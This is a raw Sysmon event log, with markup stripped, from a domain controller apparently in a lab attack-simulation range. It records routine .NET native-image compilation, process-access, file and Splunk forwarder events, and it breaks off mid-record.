10341000x800000000000000020068Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:31.487{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1A3-60D3-2C03-00000000CF01}6400C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020067Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:31.487{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1A3-60D3-2C03-00000000CF01}6400C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 23542300x800000000000000020066Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:31.440{4DB9351A-A1A3-60D3-2B03-00000000CF01}5516NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\I84BRTBVVB\PresentationFramework.Aero2.ni.dll.auxMD5=F91789F604526CA841F28F37B68C5E54,SHA256=D5B2D5F63E8CE0DF123D59D3D124C6F6BB12EC49088A40C7E9B911D4428E0027,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000020065Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:31.440{4DB9351A-A1A3-60D3-2B03-00000000CF01}5516NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\I84BRTBVVB\PresentationFramework.Aero2.ni.dllMD5=CA8219EEAD330BD35652A64EF3106037,SHA256=AB51A461375A9F6BD2859F45C7E13E080D1DAD15800AD9EA1958D89507A59BA9,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000020064Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:03:31.409{4DB9351A-A1A3-60D3-2B03-00000000CF01}5516C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\158c-0\PresentationFramework.Aero2.dll2021-06-23 21:03:31.409 10341000x800000000000000020063Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:31.050{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1A3-60D3-2B03-00000000CF01}5516C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020062Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:31.018{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1A3-60D3-2B03-00000000CF01}5516C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020061Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:31.018{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1A3-60D3-2B03-00000000CF01}5516C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 23542300x800000000000000020079Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:32.972{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6F7A8F7492CF768930BF15636ABA826A,SHA256=DA94E9B2FEF6AC487CEF03B51B9F516373C488E4D8B78B9C67611DE5412EF73E,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000020078Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:30.260{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61414-false10.0.1.12-8000- 10341000x800000000000000020077Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:32.737{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020076Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:32.737{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000020087Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:33.972{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F07765F12B9C0989413F4CBE791CAAEB,SHA256=2210CE7D89ADC40795C3FA906027371FAACCFB094A5FCFA93BE125DB1DB03ADA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000020086Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:33.690{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1A5-60D3-2F03-00000000CF01}6528C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020085Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:33.675{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1A5-60D3-2F03-00000000CF01}6528C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020084Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:33.675{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1A5-60D3-2F03-00000000CF01}6528C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000020083Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:33.612{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1A5-60D3-2E03-00000000CF01}6332C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020082Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:33.597{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1A5-60D3-2E03-00000000CF01}6332C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020081Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:33.597{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1A5-60D3-2E03-00000000CF01}6332C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000020080Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:03:33.440{4DB9351A-A1A3-60D3-2D03-00000000CF01}5568C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\15c0-0\Microsoft.ActiveDirectory.Management.dll2021-06-23 21:03:33.425 11241100x800000000000000020110Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:03:34.972{4DB9351A-A1A6-60D3-3503-00000000CF01}5828C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\16c4-0\Microsoft.GroupPolicy.Management.Interop.dll2021-06-23 21:03:34.972 10341000x800000000000000020109Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:34.893{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1A6-60D3-3503-00000000CF01}5828C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020108Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:34.878{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1A6-60D3-3503-00000000CF01}5828C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020107Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:34.878{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1A6-60D3-3503-00000000CF01}5828C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000020106Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:34.831{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1A6-60D3-3403-00000000CF01}6924C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020105Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:34.815{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1A6-60D3-3403-00000000CF01}6924C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020104Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:34.815{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1A6-60D3-3403-00000000CF01}6924C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000020103Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:03:34.784{4DB9351A-A1A6-60D3-3303-00000000CF01}7144C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1be8-0\Microsoft.GroupPolicy.Management.dll2021-06-23 21:03:34.784 10341000x800000000000000020102Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:34.643{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1A6-60D3-3303-00000000CF01}7144C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020101Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 